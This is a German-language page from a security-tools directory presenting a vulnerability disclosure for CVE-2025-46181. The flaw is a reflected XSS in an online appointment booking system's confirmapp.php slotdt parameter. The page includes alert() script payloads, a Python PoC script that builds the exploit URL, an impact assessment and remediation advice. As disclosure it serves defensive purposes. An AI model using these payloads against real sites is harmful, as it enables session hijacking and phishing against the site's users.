Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-46181-XSS — Offenlegung einer reflektierten XSS-Schwachstelle mit PoC-Skript und Abhilfeanleitung für ein Online-Terminbuchungssystem. Enthält Analyse anfälliger Parameter und Auswirkungsbewertung. | Kitploit
Tools/GitHubGitHub/shemkumar/cve-2025-46181-xss
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

Offenlegung einer reflektierten XSS-Schwachstelle mit PoC-Skript und Abhilfeanleitung für ein Online-Terminbuchungssystem. Enthält Analyse anfälliger Parameter und Auswirkungsbewertung.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-46181 - Reflektiertes XSS in einem Online-Terminbuchungssystem

CVE-ID: CVE-2025-46181
Entdeckt von: Shemkumar P (shemkumar.github.io)
Schwachstellentyp: Reflected Cross-Site Scripting (XSS)
Schweregrad: Mittel
Status: Offengelegt, CVE von MITRE zugewiesen


✨ Beschreibung

Eine Reflected Cross-Site Scripting (XSS)-Schwachstelle existiert in einem öffentlichen Online-Terminbuchungssystem (v1.0), insbesondere auf der Seite, die die Terminbestätigung verarbeitet. Ein GET-Parameter bereinigt die Eingabe nicht ordnungsgemäß, was JavaScript-Injection und Codeausführung im Browser des Opfers ermöglicht.


📍 Anfälliger Parameter

root@kitploit:~
GET /confirmapp.php?slotdt=<payload>

Beispiel-Payload (kodiert):

root@kitploit:~
<script>alert("XSS")</script>

💥 Proof of Concept (PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 Live-Link aus ethischen Gründen geschwärzt. Diese Schwachstelle wurde in einer kontrollierten Umgebung getestet.


⚙️ Python PoC-Skript

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ Auswirkungen

  • Beliebige JavaScript-Ausführung
  • Möglicher Session-Hijacking
  • Clickjacking oder Phishing-Weiterleitung
  • Gezielte Angriffe durch manipulierte Links

🧪 Behebung

Die Anwendung sollte:

  • Escape von Benutzereingaben mit htmlspecialchars() in PHP
  • Verwendung einer Content Security Policy (CSP)
  • Bereinigung von Benutzerdaten sowohl auf Client- als auch auf Serverseite

📜 Zeitplan

  • Entdeckt: Mai 2025
  • CVE von MITRE zugewiesen: Juni 2025
  • Öffentliche Veröffentlichung: Juni 2025

🧑‍💻 Autor

Shemkumar P
🕸️ shemkumar.github.io
🔐 Cybersecurity-Forscher | CTF-Enthusiast | CVE-Reporter


⚠️ Diese Veröffentlichung dient ausschließlich Bildungs- und Verteidigungszwecken. Das Testen oder Ausnutzen von Schwachstellen auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung haben, ist illegal und unethisch.

Tool herunterladen